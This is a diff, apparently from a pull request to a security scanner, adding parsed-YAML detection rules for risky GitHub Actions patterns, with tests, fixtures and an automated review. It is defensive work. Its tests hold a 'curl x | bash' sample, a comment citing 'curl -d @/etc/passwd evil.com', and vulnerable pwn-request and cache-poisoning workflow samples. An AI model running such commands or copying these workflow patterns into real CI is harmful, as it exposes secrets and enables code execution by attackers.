+        // head checkout is not the privileged code-exec vector; must NOT fire.
+        let wf = format!(
+            "on: [pull_request]\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/checkout@{SHA_PIN}\n        with:\n          \
+             ref: ${{{{ github.event.pull_request.head.ref }}}}\n"
+        );
+        assert!(!has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCheckoutUntrustedRef
+        ));
+    }
+
+    // --- workflow: structural, cache poisoning --------------------------
+
+    #[test]
+    fn workflow_cache_poisoning_untrusted_key_flagged() {
+        let wf = format!(
+            "on: [pull_request]\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/cache@{SHA_PIN}\n        with:\n          path: ~/.cache\n          \
+             key: deps-${{{{ github.head_ref }}}}\n"
+        );
+        assert!(has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCachePoisoning
+        ));
+    }
+
+    #[test]
+    fn workflow_cache_poisoning_restore_keys_flagged() {
+        let wf = format!(
+            "on: [pull_request]\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/cache/restore@{SHA_PIN}\n        with:\n          path: ~/.cache\n          \
+             key: build\n          restore-keys: |\n            \
+             pr-${{{{ github.event.pull_request.title }}}}\n"
+        );
+        assert!(has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCachePoisoning
+        ));
+    }
+
+    #[test]
+    fn workflow_cache_poisoning_static_key_clean() {
+        let wf = format!(
+            "on: [pull_request]\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/cache@{SHA_PIN}\n        with:\n          path: ~/.cache\n          \
+             key: deps-${{{{ hashFiles('**/lock') }}}}\n"
+        );
+        assert!(!has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCachePoisoning
+        ));
+    }
+
+    // --- workflow: extended untrusted-context markers --------------------
+
+    #[test]
+    fn workflow_untrusted_repo_description_in_run_flagged() {
+        // Extended UNTRUSTED_CONTEXT_MARKERS: repository.description is
+        // attacker-controllable and interpolating it into a run step injects.
+        let wf = "on: pull_request_target\njobs:\n  b:\n    steps:\n      \
+                  - run: echo \"${{ github.event.repository.description }}\"\n";
+        assert!(has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowUntrustedInput
+        ));
+    }
+
+    // --- workflow: structural totality -----------------------------------
+
+    #[test]
+    fn workflow_malformed_yaml_no_panic_line_checks_still_run() {
+        // A doc that does not parse as YAML must skip the structural checks
+        // gracefully while the line-based checks still fire.
+        let wf = "on: [push]\n  : : : not valid yaml : [\njobs:\n  - run: curl x | bash\n";
+        // Must not panic; the line-based curl|bash check still detects the pipe.
+        assert!(has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCurlPipeShell
+        ));
+    }
+
+    #[test]
+    fn workflow_env_passthrough_still_clean() {
+        // Regression guard for the deliberate scope decision: passing untrusted
+        // input through `env:` and referencing it as `$VAR` is the SANCTIONED
+        // mitigation and must remain clean (no structural env-value flagging).
+        let wf = "on: pull_request_target\njobs:\n  b:\n    runs-on: ubuntu-latest\n    \
+                  permissions:\n      contents: read\n    steps:\n      - run: echo \"$TITLE\"\n        \
+                  env:\n          TITLE: ${{ github.event.issue.title }}\n";
+        assert!(!has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowUntrustedInput
+        ));
     }
 
     // --- Dockerfile -------------------------------------------------------

--- a/crates/tirith-core/src/rules/cifile.rs
+++ b/crates/tirith-core/src/rules/cifile.rs
@@ -955,22 +955,31 @@ fn check_workflow_checkout_untrusted_ref(
             if !is_checkout_action(uses) {
                 continue;
             }
-            let Some(ref_val) = get_field(step, "with")
+            let with = get_field(step, "with");
+            let ref_val = with
                 .and_then(|w| get_field(w, "ref"))
-                .and_then(|r| r.as_str())
-            else {
-                continue;
-            };
-            if interpolates_pr_head_ref(ref_val) {
+                .and_then(|r| r.as_str());
+            let repository_val = with
+                .and_then(|w| get_field(w, "repository"))
+                .and_then(|r| r.as_str());
+            let untrusted_ref = ref_val.is_some_and(interpolates_pr_head_ref);
+            let untrusted_repository = repository_val.is_some_and(interpolates_pr_head_ref);
+            if untrusted_ref || untrusted_repository {
+                let source = match (untrusted_repository, untrusted_ref) {
+                    (true, true) => "fork-controlled repository and ref",
+                    (true, false) => "fork-controlled repository",
+                    (false, true) => "fork-controlled ref",
+                    (false, false) => unreachable!("guarded above"),
+                };
                 findings.push(Finding {
                     rule_id: RuleId::WorkflowCheckoutUntrustedRef,
                     severity: Severity::High,
                     title: "Workflow checks out an untrusted PR head with elevated privileges"
                         .to_string(),
                     description:
-                        "An `actions/checkout` step in this workflow checks out a pull-request head \
-                         ref (`github.event.pull_request.head.*` / `github.head_ref`, or the head \
-                         of a `workflow_run`) under a `pull_request_target` or `workflow_run` \
+                        "An `actions/checkout` step in this workflow selects a pull-request head \
+                         repository or ref (`github.event.pull_request.head.*` / `github.head_ref`, \
+                         or the head of a `workflow_run`) under a `pull_request_target` or `workflow_run` \
                          trigger. Those triggers run with the base repository's read/write \
                          `GITHUB_TOKEN` and secrets, so a subsequent build/test/lint step executes \
                          the fork's code with your credentials, the well-known \"pwn request\" \
@@ -979,7 +988,7 @@ fn check_workflow_checkout_untrusted_ref(
                          and never execute the fork's tree."
                             .to_string(),
                     evidence: vec![Evidence::Text {
-                        detail: format!("checkout ref: {}", truncate(ref_val, 160)),
+                        detail: format!("checkout source: {source}"),
                     }],
                     human_view: None,
                     agent_view: None,
@@ -2320,6 +2329,21 @@ mod tests {
              jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
              - uses: actions/checkout@{SHA_PIN}\n        with:\n          \
              ref: ${{{{ github.event.workflow_run.head_sha }}}}\n"
+        );
+        assert!(has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCheckoutUntrustedRef
+        ));
+    }
+
+    #[test]
+    fn workflow_checkout_untrusted_repository_without_ref_flagged() {
+        let wf = format!(
+            "on:\n  pull_request_target:\n    types: [opened]\npermissions:\n  contents: read\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/checkout@{SHA_PIN}\n        with:\n          \
+             repository: ${{{{ github.event.pull_request.head.repo.full_name }}}}\n      - run: make\n"
         );
         assert!(has(
             &wf,

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -175,6 +175,10 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         | RuleId::WorkflowDangerousTrigger
         | RuleId::WorkflowCurlPipeShell
         | RuleId::WorkflowUntrustedInput
+        | RuleId::WorkflowExcessivePermissions
+        | RuleId::WorkflowRunTrigger
+        | RuleId::WorkflowCheckoutUntrustedRef
+        | RuleId::WorkflowCachePoisoning
         | RuleId::DockerfileUnpinnedImage
         | RuleId::PackageScriptDangerous
         | RuleId::NotebookHiddenContent

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -125,6 +125,10 @@ pub enum RuleId {
     WorkflowDangerousTrigger,
     WorkflowCurlPipeShell,
     WorkflowUntrustedInput,
+    WorkflowExcessivePermissions,
+    WorkflowRunTrigger,
+    WorkflowCheckoutUntrustedRef,
+    WorkflowCachePoisoning,
     DockerfileUnpinnedImage,
     PackageScriptDangerous,
 

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -589,6 +589,10 @@ const ALL_RULE_IDS: &[&str] = &[
     "workflow_dangerous_trigger",
     "workflow_curl_pipe_shell",
     "workflow_untrusted_input",
+    "workflow_excessive_permissions",
+    "workflow_run_trigger",
+    "workflow_checkout_untrusted_ref",
+    "workflow_cache_poisoning",
     "dockerfile_unpinned_image",
     "package_script_dangerous",
     // AI-relevant file hidden-content scan rules
@@ -1251,6 +1255,8 @@ rule_id_variant_registry! {
     HelmUntrustedRepo, TerraformRemoteModule, BrewUntrustedTap,
     // CI / repo supply-chain scan rules
     WorkflowUnpinnedAction, WorkflowDangerousTrigger, WorkflowCurlPipeShell, WorkflowUntrustedInput,
+    WorkflowExcessivePermissions, WorkflowRunTrigger, WorkflowCheckoutUntrustedRef,
+    WorkflowCachePoisoning,
     DockerfileUnpinnedImage, PackageScriptDangerous,
     // AI-relevant file hidden-content scan rules
     NotebookHiddenContent, NotebookSuspiciousOutput, AgentInstructionHidden, SvgScriptEmbedded,
@@ -1385,50 +1391,54 @@ fn test_no_url_rules_have_no_url_fixtures() {
     let no_url_rules: HashSet<&str> = [
         "dotfile_overwrite",
         "archive_extract",
-        "pipe_to_interpreter",          // cat script | bash
-        "bidi_controls",                // exec context, no URL needed
-        "zero_width_chars",             // exec context, no URL needed
-        "unicode_tags",                 // byte-level, no URL needed
-        "invisible_math_operator",      // byte-level, no URL needed
-        "invisible_whitespace",         // byte-level, no URL needed
-        "proc_mem_access",              // /proc/*/mem access, no URL needed
-        "credential_file_sweep",        // multi-credential file access, no URL needed
-        "code_injection_env",           // export LD_PRELOAD=, no URL needed
-        "shell_injection_env",          // export BASH_ENV=, no URL needed
-        "interpreter_hijack_env",       // export PYTHONPATH=, no URL needed
-        "sensitive_env_export",         // export OPENAI_API_KEY=, no URL needed
-        "config_injection",             // file context, no URL needed
-        "config_non_ascii",             // file context, no URL needed
-        "config_invisible_unicode",     // file context, no URL needed
-        "mcp_suspicious_args",          // file context, no URL needed
-        "mcp_overly_permissive",        // file context, no URL needed
-        "mcp_duplicate_server_name",    // file context, no URL needed
-        "mcp_server_drift",             // mcp.lock FileScan, no URL needed
-        "metadata_endpoint",            // bare IP: curl 169.254.169.254/path
-        "private_network_access",       // bare IP: curl 10.0.0.1/path
-        "credential_in_text",           // token/key in text, no URL needed
-        "high_entropy_secret",          // high-entropy secret assignment, no URL needed
-        "private_key_exposed",          // PEM key block, no URL needed
-        "base64_decode_execute",        // base64 decode chain, no URL needed
-        "wrapper_chain_too_deep",       // cat x | <32+ nested env -S/sudo> bash, no URL needed
-        "data_exfiltration",            // curl -d @/etc/passwd evil.com, schemeless
-        "unsigned_repo_trust",          // apt --allow-unauthenticated, no URL needed
-        "gpg_check_disabled",           // dnf --nogpgcheck, no URL needed
-        "dynamic_code_execution",       // file scan, no URL needed
-        "obfuscated_payload",           // file scan, no URL needed
-        "suspicious_code_exfiltration", // file scan, no URL needed
-        "hangul_filler",                // byte-level, no URL needed
-        "confusable_text",              // byte-level, no URL needed
-        "workflow_unpinned_action",     // CI workflow file scan, no URL needed
-        "workflow_dangerous_trigger",   // CI workflow file scan, no URL needed
-        "workflow_curl_pipe_shell",     // CI workflow file scan, no URL needed
-        "workflow_untrusted_input",     // CI workflow file scan, no URL needed
-        "dockerfile_unpinned_image",    // Dockerfile scan, no URL needed
-        "package_script_dangerous",     // package.json scan, no URL needed
-        "notebook_hidden_content",      // .ipynb scan, no URL needed
-        "notebook_suspicious_output",   // .ipynb scan, no URL needed
-        "agent_instruction_hidden",     // AI-instruction file scan, no URL needed
-        "svg_script_embedded",          // SVG scan, no URL needed
+        "pipe_to_interpreter",             // cat script | bash
+        "bidi_controls",                   // exec context, no URL needed
+        "zero_width_chars",                // exec context, no URL needed
+        "unicode_tags",                    // byte-level, no URL needed
+        "invisible_math_operator",         // byte-level, no URL needed
+        "invisible_whitespace",            // byte-level, no URL needed
+        "proc_mem_access",                 // /proc/*/mem access, no URL needed
+        "credential_file_sweep",           // multi-credential file access, no URL needed
+        "code_injection_env",              // export LD_PRELOAD=, no URL needed
+        "shell_injection_env",             // export BASH_ENV=, no URL needed
+        "interpreter_hijack_env",          // export PYTHONPATH=, no URL needed
+        "sensitive_env_export",            // export OPENAI_API_KEY=, no URL needed
+        "config_injection",                // file context, no URL needed
+        "config_non_ascii",                // file context, no URL needed
+        "config_invisible_unicode",        // file context, no URL needed
+        "mcp_suspicious_args",             // file context, no URL needed
+        "mcp_overly_permissive",           // file context, no URL needed
+        "mcp_duplicate_server_name",       // file context, no URL needed
+        "mcp_server_drift",                // mcp.lock FileScan, no URL needed
+        "metadata_endpoint",               // bare IP: curl 169.254.169.254/path
+        "private_network_access",          // bare IP: curl 10.0.0.1/path
+        "credential_in_text",              // token/key in text, no URL needed
+        "high_entropy_secret",             // high-entropy secret assignment, no URL needed
+        "private_key_exposed",             // PEM key block, no URL needed
+        "base64_decode_execute",           // base64 decode chain, no URL needed
+        "wrapper_chain_too_deep",          // cat x | <32+ nested env -S/sudo> bash, no URL needed
+        "data_exfiltration",               // curl -d @/etc/passwd evil.com, schemeless
+        "unsigned_repo_trust",             // apt --allow-unauthenticated, no URL needed
+        "gpg_check_disabled",              // dnf --nogpgcheck, no URL needed
+        "dynamic_code_execution",          // file scan, no URL needed
+        "obfuscated_payload",              // file scan, no URL needed
+        "suspicious_code_exfiltration",    // file scan, no URL needed
+        "hangul_filler",                   // byte-level, no URL needed
+        "confusable_text",                 // byte-level, no URL needed
+        "workflow_unpinned_action",        // CI workflow file scan, no URL needed
+        "workflow_dangerous_trigger",      // CI workflow file scan, no URL needed
+        "workflow_curl_pipe_shell",        // CI workflow file scan, no URL needed
+        "workflow_untrusted_input",        // CI workflow file scan, no URL needed
+        "workflow_excessive_permissions",  // CI workflow file scan, no URL needed
+        "workflow_run_trigger",            // CI workflow file scan, no URL needed
+        "workflow_checkout_untrusted_ref", // CI workflow file scan, no URL needed
+        "workflow_cache_poisoning",        // CI workflow file scan, no URL needed
+        "dockerfile_unpinned_image",       // Dockerfile scan, no URL needed
+        "package_script_dangerous",        // package.json scan, no URL needed
+        "notebook_hidden_content",         // .ipynb scan, no URL needed
+        "notebook_suspicious_output",      // .ipynb scan, no URL needed
+        "agent_instruction_hidden",        // AI-instruction file scan, no URL needed
+        "svg_script_embedded",             // SVG scan, no URL needed
         // M8 ch5 — container-runtime rules fire without a URL in the input.
         "docker_run_privileged",           // docker run --privileged alpine
         "docker_run_sensitive_bind_mount", // docker run -v /var/run/docker.sock:...

--- a/tests/fixtures/cifile.toml
+++ b/tests/fixtures/cifile.toml
@@ -49,13 +49,18 @@ expected_rules = []
 # ── GitHub Actions: dangerous trigger ───────────────────────────────────
 
 [[fixture]]
+# A constrained `permissions:` block keeps this focused on the trigger rule:
+# without it the structural excessive-permissions check would also fire (a
+# risky trigger with an unset, broad default token). `forbidden_rules` pins
+# that the constraint suppresses it.
 name = "workflow_pull_request_target_trigger"
 min_milestone = 3
-input = "name: PR\non:\n  pull_request_target:\n    branches: [main]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo build\n"
+input = "name: PR\non:\n  pull_request_target:\n    branches: [main]\npermissions:\n  contents: read\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo build\n"
 context = "file"
 file_path = ".github/workflows/pr.yml"
 expected_action = "block"
 expected_rules = ["workflow_dangerous_trigger"]
+forbidden_rules = ["workflow_excessive_permissions", "workflow_checkout_untrusted_ref"]
 
 [[fixture]]
 name = "workflow_plain_pull_request_clean"
@@ -275,3 +280,136 @@ context = "file"
 file_path = "package.json"
 expected_action = "allow"
 expected_rules = []
+
+# ── GitHub Actions: structural (parsed-YAML) checks ─────────────────────
+#
+# The checks below parse the workflow into a YAML tree (permissions, triggers,
+# steps) rather than scanning lines. Each fixture is hand-authored synthetic
+# content (neutral names, benign commands) representing a well-documented
+# technique class; oracle tools (zizmor / actionlint / poutine / Scorecard) are
+# reference-only and none of their rule text or data is reproduced here.
+
+# ── workflow_run trigger (distinct from pull_request_target) ─────────────
+
+[[fixture]]
+name = "workflow_run_trigger"
+min_milestone = 3
+input = "name: Post CI\non:\n  workflow_run:\n    workflows: [CI]\n    types: [completed]\npermissions:\n  contents: read\njobs:\n  report:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo done\n"
+context = "file"
+file_path = ".github/workflows/post-ci.yml"
+expected_action = "block"
+expected_rules = ["workflow_run_trigger"]
+forbidden_rules = ["workflow_dangerous_trigger", "workflow_excessive_permissions", "workflow_checkout_untrusted_ref", "workflow_cache_poisoning"]
+
+[[fixture]]
+# An all-clean control: SHA-pinned checkout, constrained token, non-risky
+# trigger. None of the new structural rules (nor the line-based ones) fire.
+name = "workflow_normal_push_clean"
+min_milestone = 3
+input = "name: CI\non: [push]\npermissions:\n  contents: read\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608\n      - run: make build\n"
+context = "file"
+file_path = ".github/workflows/ci.yml"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["workflow_run_trigger", "workflow_excessive_permissions", "workflow_checkout_untrusted_ref", "workflow_cache_poisoning", "workflow_unpinned_action"]
+
+# ── excessive GITHUB_TOKEN permissions on a risky trigger ────────────────
+
+[[fixture]]
+# Explicit over-broad grant (`write-all`) on a fork-reachable trigger.
+name = "workflow_excessive_permissions_write_all"
+min_milestone = 3
+input = "name: Comment Handler\non:\n  issue_comment:\n    types: [created]\npermissions: write-all\njobs:\n  respond:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo handling\n"
+context = "file"
+file_path = ".github/workflows/comment.yml"
+expected_action = "warn"
+expected_rules = ["workflow_excessive_permissions"]
+forbidden_rules = ["workflow_dangerous_trigger", "workflow_run_trigger", "workflow_checkout_untrusted_ref", "workflow_cache_poisoning", "workflow_unpinned_action"]
+
+[[fixture]]
+# No `permissions:` block anywhere on a risky trigger; the broad default
+# token is in effect.
+name = "workflow_excessive_permissions_default_token"
+min_milestone = 3
+input = "name: Comment Handler\non:\n  issue_comment:\n    types: [created]\njobs:\n  respond:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo handling\n"
+context = "file"
+file_path = ".github/workflows/comment.yml"
+expected_action = "warn"
+expected_rules = ["workflow_excessive_permissions"]
+forbidden_rules = ["workflow_dangerous_trigger", "workflow_run_trigger", "workflow_checkout_untrusted_ref", "workflow_cache_poisoning"]
+
+[[fixture]]
+# Job-level safe permissions with the top-level unset, the "walk job-level
+# before concluding" requirement. Must NOT fire.
+name = "workflow_excessive_permissions_job_level_safe_clean"
+min_milestone = 3
+input = "name: Comment Handler\non:\n  issue_comment:\n    types: [created]\njobs:\n  respond:\n    runs-on: ubuntu-latest\n    permissions:\n      contents: read\n    steps:\n      - run: echo handling\n"
+context = "file"
+file_path = ".github/workflows/comment.yml"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["workflow_excessive_permissions"]
+
+[[fixture]]
+# A scoped write that is NOT `contents: write` (issues: write) is a deliberate
+# least-privilege grant on a risky trigger; must NOT fire.
+name = "workflow_excessive_permissions_scoped_write_clean"
+min_milestone = 3
+input = "name: Triage\non:\n  issues:\n    types: [opened]\npermissions:\n  issues: write\njobs:\n  triage:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo triage\n"
+context = "file"
+file_path = ".github/workflows/triage.yml"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["workflow_excessive_permissions"]
+
+# ── checkout of an untrusted PR head under a privileged trigger ──────────
+
+[[fixture]]
+# The "pwn request" pattern: pull_request_target + checkout of the PR head ref.
+# Also fires the (line-based) dangerous-trigger rule; the token is constrained
+# so excessive-permissions does not, and the SHA pin keeps unpinned-action off.
+name = "workflow_checkout_untrusted_pr_head"
+min_milestone = 3
+input = "name: PR Build\non:\n  pull_request_target:\n    types: [opened, synchronize]\npermissions:\n  contents: read\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608\n        with:\n          ref: ${{ github.event.pull_request.head.ref }}\n      - run: make test\n"
+context = "file"
+file_path = ".github/workflows/pr-build.yml"
+expected_action = "block"
+expected_rules = ["workflow_checkout_untrusted_ref", "workflow_dangerous_trigger"]
+forbidden_rules = ["workflow_excessive_permissions", "workflow_run_trigger", "workflow_cache_poisoning", "workflow_untrusted_input", "workflow_unpinned_action"]
+
+[[fixture]]
+# pull_request_target that checks out the base (no untrusted ref). Fires only
+# the trigger rule; the checkout rule must NOT fire.
+name = "workflow_checkout_base_ref_clean"
+min_milestone = 3
+input = "name: PR Label\non:\n  pull_request_target:\n    types: [opened]\npermissions:\n  contents: read\njobs:\n  label:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608\n      - run: echo label\n"
+context = "file"
+file_path = ".github/workflows/pr-label.yml"
+expected_action = "block"
+expected_rules = ["workflow_dangerous_trigger"]
+forbidden_rules = ["workflow_checkout_untrusted_ref", "workflow_excessive_permissions", "workflow_unpinned_action"]
+
+# ── cache-key poisoning ──────────────────────────────────────────────────
+
+[[fixture]]
+# A cache key built from an untrusted context (github.head_ref).
+name = "workflow_cache_key_untrusted"
+min_milestone = 3
+input = "name: Build\non: [pull_request]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/cache@8ade135a41bc03ea155e62e844d188df1ea18608\n        with:\n          path: ~/.cache/deps\n          key: deps-${{ github.head_ref }}\n      - run: make build\n"
+context = "file"
+file_path = ".github/workflows/build.yml"
+expected_action = "warn"
+expected_rules = ["workflow_cache_poisoning"]
+forbidden_rules = ["workflow_excessive_permissions", "workflow_dangerous_trigger", "workflow_run_trigger", "workflow_checkout_untrusted_ref", "workflow_untrusted_input", "workflow_unpinned_action"]
+
+[[fixture]]
+# A cache key built only from trusted, content-derived values (hashFiles) is
+# safe and must NOT fire.
+name = "workflow_cache_key_static_clean"
+min_milestone = 3
+input = "name: Build\non: [pull_request]\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/cache@8ade135a41bc03ea155e62e844d188df1ea18608\n        with:\n          path: ~/.cache/deps\n          key: deps-${{ hashFiles('**/lockfile') }}\n      - run: make build\n"
+context = "file"
+file_path = ".github/workflows/build.yml"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["workflow_cache_poisoning", "workflow_untrusted_input", "workflow_unpinned_action"]


### PR DESCRIPTION
## What this is

Closes concrete GitHub Actions detection gaps in rules/cifile.rs with STRUCTURAL YAML checks (serde_yaml::Value walk) instead of line scanning, which is too easy to fool for permissions, cache keys, workflow_run, and checkout refs. zizmor, actionlint, poutine, and OpenSSF Scorecard were used strictly as oracles (run them, compare outputs, write our own logic); no vendored rules or rule text. Malformed YAML falls back to the existing line-based checks.

## New rules (all FileScan-context, tier-1 exempt by design)

- **WorkflowExcessivePermissions** (Medium): 3-state permission evaluation at BOTH workflow and job level; flags only when neither level constrains permissions on a risky fork-reachable trigger, or when write-all / broad `contents: write` appears on one. Top-level missing alone is not sufficient.
- **WorkflowCheckoutUntrustedRef** (High): `actions/checkout` with `ref:` bound to a PR head (`github.event.pull_request.head.*`, `github.head_ref`) under `pull_request_target` or `workflow_run` - the code-exec-on-fork pattern, detected via the parsed step tree.
- **WorkflowCachePoisoning** (Medium): `actions/cache`, `cache/save`, and `cache/restore` keys interpolating an untrusted context.
- **WorkflowRunTrigger** (Medium): `workflow_run` privilege risk as a DISTINCT rule from `pull_request_target` (different mechanics, different remediation text).
- `UNTRUSTED_CONTEXT_MARKERS` extended in place (repository description/homepage, workflow_run head_*). Deliberately did NOT blind-flag `env:` values: that would contradict the sanctioned env-passthrough mitigation the existing contract tests pin.

## Registration and tests

Full RuleId checklist: verdict enum, build.rs EXPECTED_RULES, rule_explanations.toml blocks, golden_fixtures ALL_RULE_IDS, cifile.toml fixtures with forbidden_rules pins for double-fire boundaries. The exhaustive matches in scoring.rs and output_filter.rs (no wildcard arm) forced explicit classification of all four variants. cifile 89/89, golden fixtures 41/41 including the tier-1 safeguard.

## Stack

PR2 of the series, stacked on #170 (base: `security/out-sanitize`). Full gate green: fmt --check, clippy -D warnings (stable and 1.83), test --workspace (1.83), cargo deny check.

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR adds structural GitHub Actions security checks. The main changes are:

- Parsed-YAML checks for risky triggers and excessive token permissions.
- Detection for privileged checkout of pull-request heads.
- Detection for attacker-controlled cache keys.
- Registration, explanations, scoring updates, and fixtures for four new rules.

<h3>Confidence Score: 4/5</h3>

The privileged checkout detector has a contained security gap that needs fixing before merging.

- Trigger, permission, cache, and rule-registration paths are consistently integrated.
- An attacker-controlled `with.repository` can bypass the new checkout finding when `with.ref` is absent.

crates/tirith-core/src/rules/cifile.rs

<details open><summary><h3>Security Review</h3></summary>

The new privileged-checkout rule misses `actions/checkout` calls that select an attacker-controlled fork through `with.repository` without setting `with.ref`.
</details>

<h3>Important Files Changed</h3>

| Filename | Overview |
|----------|----------|
| crates/tirith-core/src/rules/cifile.rs | Adds structural workflow checks; checkout detection misses attacker-controlled repository inputs without an explicit ref. |
| crates/tirith-core/assets/data/rule_explanations.toml | Adds explanations and remediation guidance for the four new workflow rules. |
| crates/tirith-core/build.rs | Registers the four new rule identifiers in the expected-rule list. |
| crates/tirith-core/src/verdict.rs | Adds verdict variants for the new workflow rules. |
| crates/tirith-core/tests/golden_fixtures.rs | Extends exhaustive rule registration and tier-one coverage checks. |
| tests/fixtures/cifile.toml | Adds structural workflow fixtures but does not cover an untrusted repository input without a ref. |

<a href="https://app.greptile.com/ide/claude-code?prompt=Fix%20the%20following%201%20code%20review%20issue.%20Work%20through%20them%20one%20at%20a%20time%2C%20proposing%20concise%20fixes.%0A%0A---%0A%0A%23%23%23%20Issue%201%20of%201%0Acrates%2Ftirith-core%2Fsrc%2Frules%2Fcifile.rs%3A958-962%0A**Untrusted%20Repository%20Checkout%20Is%20Missed**%0A%0AThe%20rule%20only%20checks%20%60with.ref%60%2C%20so%20%60repository%3A%20%24%7B%7B%20github.event.pull_request.head.repo.full_name%20%7D%7D%60%20with%20no%20explicit%20ref%20is%20not%20reported.%20Under%20%60pull_request_target%60%2C%20checkout%20then%20uses%20the%20attacker-controlled%20fork's%20default%20branch%2C%20and%20later%20build%20or%20test%20steps%20can%20execute%20that%20code%20with%20the%20privileged%20workflow's%20token%20and%20secrets.%0A%0A&repo=sheeki03%2Ftirith&pr=171&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaudeDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=6"><img alt="Fix All in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=6"></picture></a>

<sub>Reviews (1): Last reviewed commit: ["feat(cifile): add structural GitHub Acti..."](https://github.com/sheeki03/tirith/commit/ff7a9fb8f8f950ad638175d43916205bec855a14) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=44742421)</sub>

> Greptile also left **1 inline comment** on this PR.

<!-- /greptile_comment -->